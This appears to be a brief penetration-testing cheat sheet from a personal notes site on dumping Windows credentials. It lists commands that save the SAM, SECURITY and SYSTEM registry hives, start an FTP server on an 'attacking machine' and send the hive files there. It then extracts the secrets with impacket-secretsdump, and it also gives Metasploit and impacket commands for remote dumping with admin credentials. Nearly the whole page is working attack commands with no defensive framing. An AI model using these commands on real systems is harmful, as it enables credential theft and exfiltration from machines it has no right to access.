psy8.dev

CRD - Dumping Clear Text Credentials

1 Min. Lesezeit

technique windows

Dumping Clear Text Credentials

1.0 Registry Hive local

HKEY_LOCAL_MACHINE/Security/Policy/Secrets

NOTE

User needs read permissions for the registry key

reg save hklm\sam c:\temp\sam.save
reg save hklm\security c:\temp\security.save
reg save hklm\system c:\temp\system.save

Starting FTP Server on attacking machine

Python FTP Server PY - python FTP Server

python3 -m pyftpdlib -w --user=haxx --password=0xdeadbeef

transfer files to attacking machine

open 10.100.13.58 2121
user:
pass:
lcd c:\users\user
send sam.save
send security.save
send system.save
quit

Read cached credentials with impacket

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

2.0 Registry Hive remote

Admin-Permissions

You need administrative privileges to extract the credentials

Metasploit

Impacket Secretsdump
use scanner/smb/impacket/secretsdump
set RHOSTS 192.168.1.1
set SMBDOMAIN domain
set SMBUSER user
set SMBPASS pass
Link zum Original

impacket

impacket-secretsdump domain/privUser@192.168.2.1

Graphansicht

Backlinks